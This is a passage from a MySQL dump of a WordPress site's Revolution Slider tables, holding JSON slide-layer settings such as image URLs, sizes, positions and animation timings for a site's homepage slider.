v\":\"579px\"}},\"height\":{\"d\":{\"v\":\"500px\",\"e\":true},\"n\":{\"v\":\"412px\"},\"t\":{\"v\":\"313px\"},\"m\":{\"v\":\"193px\"}},\"originalWidth\":1200,\"originalHeight\":400,\"aspectRatio\":{\"d\":{\"v\":3},\"n\":{\"v\":3},\"t\":{\"v\":3},\"m\":{\"v\":3}},\"scaleProportional\":true,\"originalSize\":false},\"position\":{\"x\":{\"d\":{\"v\":\"-1px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-50px\",\"e\":true},\"n\":{\"v\":\"-41px\"},\"t\":{\"v\":\"-31px\"},\"m\":{\"v\":\"-19px\"}},\"zIndex\":5},\"group\":{\"groupOrder\":5},\"timeline\":{\"frames\":{\"frame_0\":{\"timeline\":{\"endWithSlide\":false}},\"frame_1\":{\"timeline\":{\"endWithSlide\":false,\"frameLength\":300}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":9000,\"endWithSlide\":true,\"frameLength\":300}}},\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontSize\":{\"n\":{\"v\":\"16\"},\"t\":{\"v\":\"12\"},\"m\":{\"v\":\"7\"}},\"lineHeight\":{\"n\":{\"v\":\"20\"},\"t\":{\"v\":\"15\"},\"m\":{\"v\":\"9\"}},\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0],\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[]},\"type\":\"image\"},\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0}},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0}},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0}}}','{\"version\":\"6.1.8\"}'); /*!40000 ALTER TABLE `wpvt_revslider_slides_bkp` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_revslider_static_slides` -- DROP TABLE IF EXISTS `wpvt_revslider_static_slides`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_revslider_static_slides` ( `id` int(9) NOT NULL AUTO_INCREMENT, `slider_id` int(9) NOT NULL, `params` longtext NOT NULL, `layers` longtext NOT NULL, `settings` text NOT NULL, UNIQUE KEY `id` (`id`), KEY `slider_id_index` (`slider_id`) ) ENGINE=MyISAM AUTO_INCREMENT=10 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_revslider_static_slides` -- LOCK TABLES `wpvt_revslider_static_slides` WRITE; /*!40000 ALTER TABLE `wpvt_revslider_static_slides` DISABLE KEYS */; INSERT INTO `wpvt_revslider_static_slides` (`id`, `slider_id`, `params`, `layers`, `settings`) VALUES (1,2,'{\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','[]','{\"version\":\"6.6.0\"}'),(2,6,'{\"static\":{\"overflow\":\"visible\"},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','[]','{\"0\":\"\",\"version\":\"6.6.0\"}'),(3,7,'{\"static\":{\"overflow\":\"visible\"},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"7\":{\"text\":\"Image 13\",\"alias\":\"Image 13\",\"uid\":7,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h8-slide1-graphic4.png\",\"imageId\":942},\"size\":{\"width\":{\"d\":{\"v\":\"307px\",\"e\":true},\"n\":{\"v\":\"186\",\"e\":true},\"t\":{\"v\":\"186\"},\"m\":{\"v\":\"123\",\"e\":true}},\"height\":{\"d\":{\"v\":\"326px\",\"e\":true},\"n\":{\"v\":\"198px\",\"e\":true},\"t\":{\"v\":\"198px\"},\"m\":{\"v\":\"131px\",\"e\":true}},\"originalWidth\":307,\"originalHeight\":326,\"aspectRatio\":{\"d\":{\"v\":0.941717791411043},\"n\":{\"v\":0.941717791411043},\"t\":{\"v\":0.941717791411043},\"m\":{\"v\":0.941717791411043}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":2700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"8\":{\"text\":\"Image 14\",\"alias\":\"Image 14\",\"uid\":8,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h8-slide1-graphic1.png\",\"imageId\":943},\"size\":{\"width\":{\"d\":{\"v\":\"593px\",\"e\":true},\"n\":{\"v\":\"517px\",\"e\":true},\"t\":{\"v\":\"517px\"},\"m\":{\"v\":\"404\",\"e\":true}},\"height\":{\"d\":{\"v\":\"342px\",\"e\":true},\"n\":{\"v\":\"298px\",\"e\":true},\"t\":{\"v\":\"298px\"},\"m\":{\"v\":\"233px\",\"e\":true}},\"originalWidth\":593,\"originalHeight\":342,\"aspectRatio\":{\"d\":{\"v\":1.7339181286549707},\"n\":{\"v\":1.7339181286549707},\"t\":{\"v\":1.7339181286549707},\"m\":{\"v\":1.7339181286549707}}},\"position\":{\"x\":{\"d\":{\"v\":\"3px\",\"e\":true},\"n\":{\"v\":\"5px\",\"e\":true},\"t\":{\"v\":\"5px\",\"e\":true},\"m\":{\"v\":\"5px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"15px\",\"e\":true},\"n\":{\"v\":\"31px\",\"e\":true},\"t\":{\"v\":\"15px\",\"e\":true},\"m\":{\"v\":\"14px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":2700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"9\":{\"text\":\"Image 15\",\"alias\":\"Image 15\",\"uid\":9,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h8-slide1-graphic2.png\",\"imageId\":944},\"size\":{\"width\":{\"d\":{\"v\":\"74px\",\"e\":true},\"n\":{\"v\":\"74px\",\"e\":true},\"t\":{\"v\":\"74px\"},\"m\":{\"v\":\"45px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"67px\",\"e\":true},\"n\":{\"v\":\"67px\",\"e\":true},\"t\":{\"v\":\"67px\"},\"m\":{\"v\":\"41px\",\"e\":true}},\"originalWidth\":74,\"originalHeight\":67,\"aspectRatio\":{\"d\":{\"v\":1.1044776119402986},\"n\":{\"v\":1.1044776119402986},\"t\":{\"v\":1.1044776119402986},\"m\":{\"v\":1.1044776119402986}}},\"position\":{\"x\":{\"d\":{\"v\":\"4px\",\"e\":true},\"n\":{\"v\":\"5px\",\"e\":true},\"t\":{\"v\":\"5px\",\"e\":true},\"m\":{\"v\":\"4px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-152px\",\"e\":true},\"n\":{\"v\":\"-137px\",\"e\":true},\"t\":{\"v\":\"-153px\",\"e\":true},\"m\":{\"v\":\"-114px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":2700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"11\":{\"text\":\"Let Your Soul Glow\",\"alias\":\"Let Your Soul Glow\",\"uid\":11,\"media\":{\"imageUrl\":\"\"},\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"3px\",\"e\":true},\"n\":{\"v\":\"7px\",\"e\":true},\"t\":{\"v\":\"5px\",\"e\":true},\"m\":{\"v\":\"9px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-100px\",\"e\":true},\"n\":{\"v\":\"-74px\",\"e\":true},\"t\":{\"v\":\"-92px\",\"e\":true},\"m\":{\"v\":\"-73px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":8,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":2700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"PT 